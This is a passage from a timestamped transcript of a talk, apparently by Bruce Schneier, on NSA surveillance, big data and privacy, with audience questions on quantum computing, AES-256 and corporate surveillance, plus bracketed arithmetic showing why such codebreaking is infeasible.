It's about surveillance as a business model. 720 00:46:03,000 --> 00:46:07,000 And it's about the societal benefits of big data versus the individual 721 00:46:07,000 --> 00:46:10,000 risks of personal data. 722 00:46:10,000 --> 00:46:15,000 What do we do with data that benefits society as a group, 723 00:46:15,000 --> 00:46:19,000 when that same data is personal to individuals? 724 00:46:19,000 --> 00:46:23,000 Think of behavioral data: behavioral data for advertising. 725 00:46:23,000 --> 00:46:26,000 Think of medical data, education data. 726 00:46:26,000 --> 00:46:29,000 Actually, medical data is, I think, the easiest way to explain it. 727 00:46:29,000 --> 00:46:32,000 If we put all of our health records in a massive database, that 728 00:46:32,000 --> 00:46:36,000 would be enormously valuable for research, 729 00:46:36,000 --> 00:46:38,000 yet incredibly personal. 730 00:46:38,000 --> 00:46:41,000 How do we deal with that?
731 00:46:41,000 --> 00:46:46,000 How do we extract the group benefits of data while still protecting 732 00:46:46,000 --> 00:46:47,000 individuals? 733 00:46:47,000 --> 00:46:51,000 That's really what this NSA debate is about. 734 00:46:52,000 --> 00:46:55,000 And that's just one of many debates. 735 00:46:55,000 --> 00:46:58,000 I think this is the fundamental issue of the information society. 736 00:46:58,000 --> 00:47:01,000 I think solving it will take decades. 737 00:47:01,000 --> 00:47:06,000 And solving it is what the historians of this era are going to write about. 738 00:47:06,000 --> 00:47:08,000 Because that's what's important. 739 00:47:08,000 --> 00:47:12,000 So thanks, and I'm happy to take a few questions. 740 00:47:12,000 --> 00:47:24,000 So there's a microphone in the middle, standing there. 741 00:47:24,000 --> 00:47:27,000 And that's going to be the question mic. 742 00:47:27,000 --> 00:47:29,000 So you would have to run over there quickly. 743 00:47:29,000 --> 00:47:30,000 Yes. 744 00:47:30,000 --> 00:47:38,000 Am I literally the only one? 745 00:47:38,000 --> 00:47:40,000 Actually, you're figuratively the only one. 746 00:47:40,000 --> 00:47:42,000 Figuratively. 747 00:47:42,000 --> 00:47:43,000 Yeah. 748 00:47:43,000 --> 00:47:48,000 I work with a PhD physicist who's, admittedly, a pretty paranoid guy. 749 00:47:48,000 --> 00:47:55,000 But he's utterly convinced that the NSA has a functional, working quantum computer 750 00:47:55,000 --> 00:48:02,000 that is capable of decrypting SSL in real time, at line rate, on 10-gig links. 751 00:48:02,000 --> 00:48:03,000 So let's have a show of hands. 752 00:48:03,000 --> 00:48:07,000 Who thinks that physicist is paranoid and dreaming? 753 00:48:07,000 --> 00:48:08,000 So that's what I thought. 754 00:48:08,000 --> 00:48:09,000 But I wanted to know. 755 00:48:09,000 --> 00:48:12,000 Okay, and who thinks he's right? 756 00:48:12,000 --> 00:48:13,000 Okay. 757 00:48:13,000 --> 00:48:14,000 I vote paranoid and dreaming. 758 00:48:14,000 --> 00:48:16,000 By a lot. 759 00:48:16,000 --> 00:48:19,000 We can factor, like, 15, I think. 760 00:48:19,000 --> 00:48:24,000 And quantum computers are nowhere near that. 761 00:48:24,000 --> 00:48:27,000 I mean, yes, of course they have a program to do research. 762 00:48:27,000 --> 00:48:28,000 I mean, why wouldn't they? 763 00:48:28,000 --> 00:48:30,000 It would be embarrassing if they didn't. 764 00:48:30,000 --> 00:48:32,000 But no, this is really science fiction. 765 00:48:32,000 --> 00:48:34,000 The world would be very different otherwise. 766 00:48:34,000 --> 00:48:38,000 I don't think that's even remotely possible right now. 767 00:48:38,000 --> 00:48:40,000 It'd be cool if I was wrong, wouldn't it? 768 00:48:40,000 --> 00:48:42,000 But I just don't think so. 769 00:48:42,000 --> 00:48:45,000 But this is the problem with a lot of this stuff, right? 770 00:48:45,000 --> 00:48:50,000 On the one hand, it's really, really cool that the United States kills people with flying robots. 771 00:48:50,000 --> 00:48:53,000 On the other hand, oh my god, we kill people with flying robots. 772 00:48:53,000 --> 00:48:55,000 Huh, right? 773 00:48:55,000 --> 00:48:58,000 Right? This is fun. 774 00:48:58,000 --> 00:49:03,000 It makes it really hard.
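[A rough sense of the scale gap behind "we can factor, like, 15": the published quantum factoring demonstrations used only a handful of qubits, while a common estimate for Shor's algorithm (Beauregard's circuit, $2n + 3$ logical qubits for an $n$-bit modulus; the exact constant varies by construction) gives, for $N = 15$ ($n = 4$ bits) versus the 2048-bit RSA keys typically protecting an SSL session:

\[ 2 \cdot 4 + 3 = 11 \quad \text{vs.} \quad 2 \cdot 2048 + 3 = 4099 \ \text{logical qubits}, \]

and each logical qubit would in turn need on the order of thousands of error-corrected physical qubits. The numbers here are a back-of-the-envelope sketch, but the orders of magnitude are the point.]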
775 00:49:03,000 --> 00:49:04,000 Yes. 776 00:49:04,000 --> 00:49:05,000 Hi, Bruce. 777 00:49:05,000 --> 00:49:11,000 One of the publicly stated purposes of the Utah facility is breaking AES-256. 778 00:49:11,000 --> 00:49:15,000 You know, I've got to say that if I had the Utah facility, I wouldn't waste time on that. 779 00:49:15,000 --> 00:49:18,000 I mean, the Utah facility, I believe, is for data storage. 780 00:49:18,000 --> 00:49:21,000 It's storage and data processing of all of this metadata. 781 00:49:21,000 --> 00:49:30,000 They have these massive data-mining algorithms, like some of the things I talked about for cell phone location data, 782 00:49:30,000 --> 00:49:37,000 and they just need all the data to be in RAM somewhere, or on disk. I mean, it needs to be close. 783 00:49:37,000 --> 00:49:38,000 It can't be on tape. 784 00:49:38,000 --> 00:49:46,000 So they need facilities that can move this data around, do that processing, and do the parallel work really efficiently. 785 00:49:46,000 --> 00:49:48,000 That's what I think that is about. 786 00:49:48,000 --> 00:49:54,000 I mean, brute-forcing AES-256 is a lot more computing than would ever be there, and I think it would be a waste of their time. 787 00:49:54,000 --> 00:49:58,000 I mean, the real hard thing here is analysis, not getting more data. 788 00:49:58,000 --> 00:50:04,000 An encrypted message going from A to B: they know the message is there, they know how long it is. 789 00:50:04,000 --> 00:50:05,000 That's good enough. 790 00:50:05,000 --> 00:50:07,000 Let's figure out what's really going on. 791 00:50:07,000 --> 00:50:09,000 So they're not just mining Bitcoin? 792 00:50:09,000 --> 00:50:10,000 Sorry? 793 00:50:10,000 --> 00:50:12,000 They're not... 794 00:50:12,000 --> 00:50:14,000 I didn't hear that. 795 00:50:14,000 --> 00:50:16,000 So they're not just mining Bitcoin. 796 00:50:16,000 --> 00:50:18,000 They didn't hear it. 797 00:50:18,000 --> 00:50:21,000 If they wanted to mine bitcoins, they'd use your computer.
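[The arithmetic behind "a waste of their time," as a back-of-the-envelope sketch with assumed but generous numbers: a 256-bit key space holds $2^{256} \approx 1.2 \times 10^{77}$ keys. Even a hypothetical billion machines each testing $10^{18}$ keys per second, $10^{27}$ keys per second in total, would need

\[ \frac{2^{256}}{10^{27}\ \mathrm{keys/s}} \approx 1.2 \times 10^{50}\ \mathrm{s}, \]

against roughly $4 \times 10^{17}$ seconds since the Big Bang. No data center budget closes that gap; exhaustive search is simply the wrong model for how AES-256 would ever fail.]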
798 00:50:29,000 --> 00:50:32,000 Can you say anything about your meeting with Congress earlier in the week? 799 00:50:32,000 --> 00:50:35,000 Not more than I said on my blog. 800 00:50:35,000 --> 00:50:37,000 The meeting happened. 801 00:50:37,000 --> 00:50:39,000 It was kind of weird. 802 00:50:39,000 --> 00:50:41,000 I mean, the meeting was, we said, off the record. 803 00:50:41,000 --> 00:50:45,000 And it was a candid, interesting conversation with people who were reform-minded. 804 00:50:45,000 --> 00:50:52,000 And I'd like to give them as much leeway and ability to do what they want to do as possible. 805 00:50:52,000 --> 00:50:55,000 So I'm not going to say anything. 806 00:50:55,000 --> 00:51:01,000 But there were, you know, good guys on all sides of the aisle, so it was really kind of neat. 807 00:51:01,000 --> 00:51:06,000 How does the alignment of public companies and their interests play into this? 808 00:51:06,000 --> 00:51:10,000 Because you still have, you know, private companies, rather, 809 00:51:10,000 --> 00:51:11,000 who do have different interests. 810 00:51:11,000 --> 00:51:16,000 And so, you know, they're potentially developing models that undermine 811 00:51:16,000 --> 00:51:19,000 the privacy interests that you're talking about. 812 00:51:19,000 --> 00:51:22,000 So if you have corporations that are doing one thing, 813 00:51:22,000 --> 00:51:24,000 and then the kind of interests you're talking about, 814 00:51:24,000 --> 00:51:28,000 how does all that tie together into a solution? 815 00:51:28,000 --> 00:51:32,000 I worry a lot about private corporate surveillance. 816 00:51:32,000 --> 00:51:34,000 I mean, I worry a lot about surveillance as the business model 817 00:51:34,000 --> 00:51:38,000 of the internet. I mean, I read this recently. 818 00:51:38,000 --> 00:51:43,000 Someone said, well, you should worry less about the NSA, because they're trying to protect you against terrorism, as opposed to, you know, 819 00:51:43,000 --> 00:51:48,000 Facebook and Google, who are trying to psychologically manipulate you to buy things. 820 00:51:48,000 --> 00:51:53,000 Right? So on the one hand, that makes sense. On the other hand, 821 00:51:53,000 --> 00:51:56,000 the false-alarm problem is really different. 822 00:51:56,000 --> 00:52:00,000 Right? If Facebook gets it wrong, they show you an ad for a Chevy you don't want. 823 00:52:00,000 --> 00:52:03,000 If the NSA gets it wrong, they drop a drone on your head. 824 00:52:03,000 --> 00:52:07,000 So there are differences there. I think both are worrying. 825 00:52:07,000 --> 00:52:09,000 I think the interplay is a big problem. 826 00:52:09,000 --> 00:52:13,000 And that's why I think this is a bigger question than the NSA. 827 00:52:13,000 --> 00:52:15,000 The NSA is just one aspect of this. 828 00:52:15,000 --> 00:52:19,000 I'm having watches waved at me from all directions, so for the rest of you in line, 829 00:52:19,000 --> 00:52:21,000 I'm really sorry. I'll be out there. 830 00:52:21,000 --> 00:52:23,000 Thank you very much. 831 00:52:23,000 --> 00:52:35,000 Thank you.